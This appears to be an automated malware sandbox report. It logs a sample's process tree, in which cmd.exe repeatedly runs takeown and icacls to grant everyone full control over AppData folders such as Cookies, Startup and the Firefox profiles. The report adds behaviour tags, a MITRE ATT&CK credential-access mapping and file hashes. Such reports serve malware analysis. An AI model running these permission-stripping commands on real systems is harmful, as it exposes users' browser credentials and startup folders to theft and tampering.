C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\UProof && icacls C:\Users\Admin\AppData\Roaming\Microsoft\UProof /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\UProof3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\UProof /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Word /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Word /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla && icacls C:\Users\Admin\AppData\Roaming\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Extensions && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Extensions /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Extensions3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Extensions /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings /grant everyone:(f)2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.Admin && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.Admin /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\bookmarkbackups && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\bookmarkbackups /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\bookmarkbackups3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\bookmarkbackups /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data\[email protected] && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data\[email protected] /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data\[email protected]3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\browser-extension-data\[email protected] /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes\events && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes\events /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes\events3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\crashes\events /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\datareporting && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\datareporting /grant everyone:(f)2⤵
-
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\CompareRedo.docx"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /vu "C:\Users\Admin\Desktop\CompareRedo.docx"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-794947293-7174191371454214199-5225412761204182439122370762521020747751042376806"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15774141451361977236-13957188392088679606-1121857374-2115509804-500408850612992615"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-153579436-776949447400070715-2072866164-1018368456156487666197241926703629289"1⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1717349589493136752311570549-1945540586-497950969-933787195262199439157154982"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1606694425-20064268573207588211315087071877260375514114537-142447461329825239"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-627938489-8852264612084484395-1614389945-1935454222-17936563201241020574811491757"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13479806171519743657-88652830613122663522120523396-962652954-1714382625-1230561748"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2102608743-1838238370432392517-8656263731908109898-2575609031750902926-1692154394"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "127761860917875177761292089050938353847-1671129059284639182-1749768205816282513"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-414482523765499163143366019917332902251236564201-368276752-7430080611944375385"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1144601860-2551353421976082431-1365047443425484685-205632579-118933329-1593520646"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2037775683-5378969201485850573462688520206132714-854350230-851709699-1886636622"1⤵
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5e28f180275ca74119d3ec40c55620bc1
SHA1c2f89ba176c023cb7501f91b8206cb39d65344ac
SHA2568e79b5bbe22d0ac624074709adc6834c77dcaa156d23c796cc513fef3631b30e
SHA512fd8da5671f098bb652f2e91cb0921329c014a60236e0215551c78d3be2762c8409a1c509621765748062d4d2ba116e220143d826c44a316474ff96d01c9e94a4
-
Filesize
4.0MB
MD5d572f3c193cbfc88c4f3779657b8e20d
SHA1db07b42317293f2e331c4f34a34fc44abb4c9793
SHA2565e9b4e081abe7439af6fe53489108d8de3d0c9dbc297f080a1cf17e4913fdfd5
SHA512cae95d69f65b13de18908d57186a7fd9c74762152a3e0a51f5031ff029231cffdaf40e69b07c5ecbf812cd8f7c6d2c425abba35ad8fe4567e66a6df949751564
-
Filesize
999B
MD53c08f756f2838ba0a6726968bf6eef70
SHA1b92182f199eadf7ff1931a4065462d3115fabc44
SHA25601179daebf3e591324f4b887a9f103df802e5d47a1ff341b061ef078f10b0c14
SHA512d052f11c85f7f9b4333fb19ec1b63a526456693fc4e32c6d67db295ef5b5e12cde9a72c44a3be13fafb487c2962d1d6fa4750bc8115b996e578a3c73f0a7320d
-
Filesize
999B
